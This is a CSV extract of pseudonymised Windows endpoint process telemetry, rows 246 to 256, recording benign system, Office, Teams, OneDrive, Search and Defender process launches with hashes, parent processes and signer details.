+246,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:10:55.152452300+00:00,11624,UsoClient.exe,usoclient.exe ReportPolicies,PortableExecutable,2021-04-14 01:10:15.165138700+00:00,C:\Windows\System32\UsoClient.exe,89600,cb83db7acb08ccd0370200eed9a1803b,278567a8a88fb508453c6e415eba46e1d23a419fc2d09992df95883c9f37cebb,76996171bfcbdfad71405cf376b1cd045a2fbb2e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:55.266856200+00:00,2021-06-24 01:11:17.332558300+00:00,e57dd177-16fc-4898-8c28-6438a9cbe2a4,computerpii_0a470890c60768167990033d701e7bd881398861,170138,False,10.7740.19041.1052,False,11540474045136925,,11540474045175507,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,UsoClient,UsoClient,UsoClient
+247,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:10:55.285977200+00:00,17120,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:10:55.219804900+00:00,13800,cmd.exe,"""cmd.exe"" /c ""dir C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Office\""",False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:55.357528100+00:00,2021-06-24 01:11:17.332632600+00:00,37a235d8-c162-4f3d-96be-a1ec5d8658a4,computerpii_0a470890c60768167990033d701e7bd881398861,170139,False,10.7740.19041.1052,False,11540474045175509,,11540474045175511,2021-06-24 01:10:55.219804900+00:00,13800,2021-06-24 01:10:55.219804900+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,13800,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 01:10:55.210484500+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+248,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:10:55.289236600+00:00,18544,SDXHelper.exe,"""sdxhelper.exe"" /onlogon",PortableExecutable,2021-06-12 08:57:27.853849200+00:00,C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe,141160,a8252d1f5f159884fd66ccd77e36e0e6,eadbb47e3d669ea39db848ba066a0b3ba226cf41cc6c62b166dd74d29007d63d,06833da5eaf54d97e885088d0a8385bee2c1f017,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:55.362311300+00:00,2021-06-24 01:11:17.332711+00:00,dc46fd5f-b602-4b6e-a0c6-cf8822181aca,computerpii_0a470890c60768167990033d701e7bd881398861,170140,False,10.7740.19041.1052,False,11540474045136925,,11540474045175512,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20738,SDXHELPER,SDXHELPER.EXE,Microsoft Office SDX Helper
+249,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:10:55.398136600+00:00,9220,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:55.418875800+00:00,2021-06-24 01:11:17.332864200+00:00,816a47dc-bb23-4d3d-bce0-c22c6b24a1c3,computerpii_0a470890c60768167990033d701e7bd881398861,170142,False,10.7740.19041.1052,False,11540474045175219,,11540474045175514,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+250,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:50:30.092709+00:00,21168,FileCoAuth.exe,"""FileCoAuth.exe"" -Embedding",PortableExecutable,2021-06-15 08:54:29.108102+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\OneDrive\21.099.0516.0003\FileCoAuth.exe,588160,624718ceb2c69ea828c8645a48b7d619,e92813d710047ef700b71b583b6ca9fd3e1cdf41c526bb692dbeead2a33a91e4,66af391870c45a7b61ac465dca5da1581b9f7eec,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:50:30.221625100+00:00,2021-06-23 06:52:17.696256300+00:00,c9293412-5654-413d-b2cc-0bdedb308b77,computerpii_0a470890c60768167990033d701e7bd881398861,164386,False,10.7740.19041.1052,False,11540474045136908,,11540474045173968,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft OneDrive,21.099.0516.0003,Microsoft OneDrive,FileCoAuth.exe,Microsoft OneDriveFile Co-Authoring Executable
+251,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:28:38.519642100+00:00,14852,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xad124055 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:28:38.694963900+00:00,2021-06-23 02:30:59.438859+00:00,5ff7faf5-6afd-4f86-a889-b9e13585ff10,computerpii_0a470890c60768167990033d701e7bd881398861,159787,False,10.7740.19041.1052,False,11540474045171720,,11540474045172748,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+252,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:53:41.274119900+00:00,20472,DataExchangeHost.exe,DataExchangeHost.exe -Embedding,PortableExecutable,2021-02-17 04:35:36.570568300+00:00,C:\Windows\System32\DataExchangeHost.exe,259408,1c684d351cbee157a985f153b7136f9a,55a8e3733ac2e88a2975e16a4e2968b7c81fb113e02f9d14ac9b0566d41e8d23,1c1d7d43df82c51a61ce852d0b226b998b47b3eb,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:53:41.345160+00:00,2021-06-25 01:54:45.344567400+00:00,9b0f85a0-b2c9-4e91-818f-2734cfa11a89,computerpii_0a470890c60768167990033d701e7bd881398861,184369,False,10.7740.19041.1052,False,11540474045136908,,11540474045178881,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,DataExchangeHost,DataExchangeHost.exe,Data Exchange Host
+253,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:53:50.680698600+00:00,10604,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe854_ Global\UsGthrCtrlFltPipeMssGthrPipe854 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:53:50.725437200+00:00,2021-06-25 01:54:45.345879300+00:00,e9e97c41-9edb-430f-90a5-6268bd39178e,computerpii_0a470890c60768167990033d701e7bd881398861,184395,False,10.7740.19041.1052,False,11540474045144190,,11540474045178889,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+254,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:25:49.946974100+00:00,6740,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 76D3E858-CCD1-14EB-87CC-6D441415C7F9 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:25:50.561560300+00:00,2021-06-23 02:26:43.074597600+00:00,dcd2e5a9-487e-43c5-8e9b-e43f92444b39,computerpii_0a470890c60768167990033d701e7bd881398861,159771,False,10.7740.19041.1052,False,11540474045145394,,11540474045172743,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+255,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 10:16:19.500920700+00:00,21228,backgroundTaskHost.exe,"""backgroundTaskHost.exe"" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca",PortableExecutable,2020-10-09 20:47:01.870262+00:00,C:\Windows\System32\backgroundTaskHost.exe,19776,da7063b17dbb8bbb3015351016868006,20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50,c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:16:19.574904+00:00,2021-06-23 10:18:09.255118800+00:00,06ade538-e231-42bb-b8a7-a0ca1ff95db9,computerpii_0a470890c60768167990033d701e7bd881398861,167000,False,10.7740.19041.1052,False,11540474045136908,,11540474045174895,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Background Task Host,backgroundTaskHost.exe,Background Task Host
+256,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 10:20:21.040809500+00:00,14364,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11220 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:20:21.118885200+00:00,2021-06-23 10:28:24.909233400+00:00,286d2aa9-869a-493a-88ec-ed9d2d784bbc,computerpii_0a470890c60768167990033d701e7bd881398861,167016,False,10.7740.19041.1052,False,11540474045171817,,11540474045174904,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
